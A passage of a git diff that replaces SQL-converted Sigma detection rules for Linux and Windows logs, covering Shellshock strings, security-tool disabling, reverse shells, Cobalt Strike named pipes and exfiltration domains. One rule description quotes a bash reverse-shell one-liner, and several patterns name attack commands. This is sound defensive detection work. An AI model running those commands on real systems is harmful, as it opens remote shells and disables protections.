LIKE '%ip6tables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%firewalld%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%firewalld%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (Image LIKE '%/service' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image 
LIKE '%/chkconfig' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (Image LIKE '%/setenforce' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%falcon-sensor%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\' AND CommandLine LIKE '%falcon-sensor%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ( = 'pkexec' AND = 'The value for environment variable XAUTHORITY contains suscipious content' AND = '[USER=root] [TTY=/dev/pts/0]')" ], - "filename": "proc_creation_lnx_security_tools_disabling.yml" + "filename": "lnx_auth_pwnkit_local_privilege_escalation.yml" }, { - "title": "File Deletion", - "id": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", - "description": "Detects file deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity", - "author": "Ömer Günal, oscd.community", + "title": "Shellshock Expression", + "id": "c67e0c98-4d39-46ee-8f6b-437ebf6b950e", + "description": "Detects shellshock expressions in log files", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Legitimate administration activities" + "Unknown" ], - "level": "informational", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/rm' ESCAPE '\\' OR Image LIKE '%/shred' ESCAPE '\\' OR Image LIKE '%/unlink' ESCAPE '\\')" + "SELECT * FROM logs WHERE (logs MATCH ('\"(){:;};\" OR \"() {:;};\" OR \"() { 
:;};\" OR \"() { :; };\"'))" ], - "filename": "proc_creation_lnx_file_deletion.yml" + "filename": "lnx_shellshock.yml" }, { - "title": "Linux Base64 Encoded Shebang In CLI", - "id": "fe2f9663-41cb-47e2-b954-8a228f3b9dff", - "description": "Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Code Injection by ld.so Preload", + "id": "7e3c4651-c347-40c4-b1d4-d48590fdf684", + "description": "Detects the ld.so preload persistence file. See `man ld.so` for more information.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.006" ], "falsepositives": [ - "Legitimate administration activities" + "Rare temporary workaround for library misconfiguration" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (CommandLine LIKE '%IyEvYmluL2Jhc2%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL2Rhc2%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL3pza%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL2Zpc2%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL3No%' ESCAPE '\\')" + "SELECT * FROM logs WHERE logs MATCH ('\"/etc/ld.so.preload\"')" ], - "filename": "proc_creation_lnx_base64_shebang_cli.yml" + "filename": "lnx_ldso_preload_injection.yml" }, { - "title": "System Information Discovery", - "id": "42df45e7-e6e9-43b5-8f26-bec5b39cc239", - "description": "Detects system information discovery commands", - "author": "Ömer Günal, oscd.community", + "title": "Suspicious Log Entries", + "id": "f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", + "description": "Detects suspicious log entries in Linux log files", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.impact" ], "falsepositives": [ - "Legitimate administration activities" + "Unknown" ], - 
"level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/uname' ESCAPE '\\' OR Image LIKE '%/hostname' ESCAPE '\\' OR Image LIKE '%/uptime' ESCAPE '\\' OR Image LIKE '%/lspci' ESCAPE '\\' OR Image LIKE '%/dmidecode' ESCAPE '\\' OR Image LIKE '%/lscpu' ESCAPE '\\' OR Image LIKE '%/lsmod' ESCAPE '\\')" + "SELECT * FROM logs WHERE (logs MATCH ('\"entered promiscuous mode\" OR \"Deactivating service\" OR \"Oversized packet received from\" OR \"imuxsock begins to drop messages\"'))" ], - "filename": "proc_creation_lnx_system_info_discovery.yml" + "filename": "lnx_shell_susp_log_entries.yml" }, { - "title": "Communication To Ngrok Tunneling Service - Linux", - "id": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "title": "Guacamole Two Users Sharing Session Anomaly", + "id": "1edd77db-0669-4fef-9598-165bda82826d", + "description": "Detects suspicious session with two users present", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Legitimate use of ngrok" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE logs MATCH ('\"(2 users now 
present)\"')" ], - "filename": "net_connection_lnx_ngrok_tunnel.yml" + "filename": "lnx_guacamole_susp_guacamole.yml" }, { - "title": "Linux Reverse Shell Indicator", - "id": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", - "description": "Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')", + "title": "Symlink Etc Passwd", + "id": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", + "description": "Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.t1204.001", + "attack.execution" + ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/bin/bash' ESCAPE '\\' AND NOT (DestinationIp IN ('127.0.0.1', '0.0.0.0')))" + "SELECT * FROM logs WHERE (logs MATCH ('\"ln -s -f /etc/passwd\" OR \"ln -s /etc/passwd\"'))" ], - "filename": "net_connection_lnx_back_connect_shell_dev.yml" + "filename": "lnx_symlink_etc_passwd.yml" }, { - "title": "Linux Crypto Mining Pool Connections", - "id": "a46c93b7-55ed-4d27-a41b-c259456c4746", - "description": "Detects process connections to a Monero crypto mining pool", + "title": "Sudo Privilege Escalation CVE-2019-14287 - Builtin", + "id": "7fcc54cb-f27d-4684-84b7-436af096f858", + "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "attack.t1548.003", + "cve.2019.14287" + ], "falsepositives": [ - "Legitimate use of crypto miners" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 
'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream')" + "SELECT * FROM logs WHERE (USER LIKE '#-%' ESCAPE '\\' OR USER LIKE '#%4294967295' ESCAPE '\\')" ], - "filename": "net_connection_lnx_crypto_mining_indicators.yml" + "filename": "lnx_sudo_cve_2019_14287_user.yml" } ] diff --git a/rules/rules_windows_generic.json b/rules/rules_windows_generic.json index 44fc46d..0f5d608 100644 --- a/rules/rules_windows_generic.json +++ b/rules/rules_windows_generic.json 
@@ -1,2636 +1,2602 @@ [ { - "title": "DNS Query for MEGA.io Upload Domain - DNS Client", - "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "title": "Malicious Named Pipe", + "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe used by known APT malware", + "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE 
'\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\')" ], - "filename": "win_dns_client_mega_nz.yml" + "filename": "pipe_created_mal_namedpipes.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", - "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "title": "CobaltStrike Named Pipe Pattern Regex", + "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName 
REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,')" ], - "filename": "win_dns_client__mal_cobaltstrike.yml" + "filename": "pipe_created_mal_cobaltstrike_re.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - DNS Client", - "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", - "status": "experimental", - "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADFS Database Named Pipe Connection", + "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "status": "test", + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Processes in the filter condition" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tssdis.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "win_dns_client_anonymfiles_com.yml" + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - DNS Client", - "id": "090ffaad-c01a-4879-850c-6d57da98452d", - "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Named Pipes", + "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "status": "test", + "description": "Detects a named pipe used by Turla group samples", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.g0010", + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\')" ], - "filename": "win_dns_client_ufile_io.yml" + "filename": "pipe_created_apt_turla_namedpipes.yml" }, { - "title": "Query Tor Onion Address - DNS Client", - "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "title": 
"CobaltStrike Named Pipe Patterns", + "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", "status": "test", - "description": "Detects DNS resolution of an .onion address related to Tor routing networks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Chrome instances using the exact same pipe name \"mojo.something\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) 
OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" ], - "filename": "win_dns_client_tor_onion.yml" + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" }, { - "title": "Protected Storage Service Access", - "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "title": "CobaltStrike Named Pipe", + "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", "status": "test", - "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR 
PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\')" ], - "filename": "win_security_protected_storage_service_access.yml" + "filename": "pipe_created_mal_cobaltstrike.yml" }, { - "title": "DPAPI Domain Backup Key Extraction", - "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", - "status": "test", - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "PsExec Tool Execution From Suspicious Locations - PipeName", + "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "status": "experimental", + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Rare legitimate use of psexec from the locations mentioned above" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_dpapi_domain_backupkey_extraction.yml" + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", - "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", - "status": "test", - "description": "Detects 
Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "DiagTrackEoP Default Named Pipe", + "id": "1f7025a6-e747-4130-aac4-961eb47015f1", + "status": "experimental", + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE PipeName LIKE '%thisispipe%' ESCAPE '\\'" + ], + "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + }, + { + "title": "EfsPotato Named Pipe", + "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "status": "experimental", + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" + "filename": "pipe_created_efspotato_namedpipe.yml" }, { - "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", - "id": 
"1bbf25b9-8038-4154-a50b-118f2a32be27", + "title": "WMI Event Consumer Created Named Pipe", + "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "status": "test", - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "author": "James Pemberton / @4A616D6573", + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" + "attack.t1047", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_local_anon_logon_created.yml" + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", - "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Koh Default Named Pipes", + "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "status": "experimental", + "description": "Detects creation of default named pipes used by the Koh tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" ], "falsepositives": [ - "Highly unlikely" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 
